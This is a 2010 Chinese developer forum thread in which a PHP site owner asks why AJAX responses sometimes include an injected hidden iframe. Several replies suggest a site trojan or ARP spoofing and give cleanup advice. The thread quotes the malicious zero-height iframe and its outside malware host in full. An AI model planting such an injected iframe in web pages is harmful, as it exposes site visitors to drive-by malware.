首页 新闻 搜索 专区 学院

紧急求助!!!

0
悬赏园豆:120 [已关闭问题]

本人的网站注册页面,用户填写用户名后,通过AJAX检查该名称是否已经注册,正常应该返回true或false,但是有时ajax请求却返回<iframe src=http://softtw.3322.org:81/wm/well.htm width=100 height=0></iframe> true或false,是不是网站被挂马了?

请求高手们指点该如何解决?

问题补充: 而且请求的结果中有时候有iframe,有时候又没有
上不了岸的鱼的主页 上不了岸的鱼 | 老鸟四级 | 园豆:4613
提问于:2010-02-05 09:47
< >
分享
其他回答(3)
0

一、先查网站文件
http://www.cnblogs.com/downmoon/archive/2009/08/20/1550427.html

二、查IIS日志。
http://www.cnblogs.com/downmoon/archive/2009/09/02/1558409.html

二、在Ajax页面增加判断条件,并借助log4net记录一些信息。

邀月 | 园豆:25375 (高人七级) | 2010-02-05 09:59
我的程序时PHP,使用apache服务器
支持(0) 反对(0) 上不了岸的鱼 | 园豆:4613 (老鸟四级) | 2010-02-05 10:29
AJAX提交的数据没有问题,但是返回的结果却带有iframe,而且不是一直都有,有时候请求结果中有,有时候没有,郁闷
支持(0) 反对(0) 上不了岸的鱼 | 园豆:4613 (老鸟四级) | 2010-02-05 14:17
0

应该是挂码了或者服务器被挂码了,所以每次请求的返回头都会多一条<iframe信息出来。

随便请求一个页面,看源html代码,是不是也有相同的iframe信息。

查看原始页面文件,看下原文件是不是也被写改过,如果是,这样的话要重新部署

路过秋天 | 园豆:4763 (老鸟四级) | 2010-02-05 11:44
0

第一感觉就是挂马了在全站搜索一下<iframe src=http://softtw.3322.org:81/wm/well.htm width=100 height=0></iframe>这段代码,删除

凯尔网络 | 园豆:159 (初学一级) | 2010-02-05 13:46
要是能搜到,我就不用到这里麻烦大家了,呵呵……
支持(0) 反对(0) 上不了岸的鱼 | 园豆:4613 (老鸟四级) | 2010-02-05 14:15
0

是木马,如果服务器自身没有问题,则可能是受到了ARP攻击,可安装360安全卫士,打开ARP防御器。

之前我有个相同经历

查尔斯 | 园豆:3832 (老鸟四级) | 2010-02-05 15:07
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册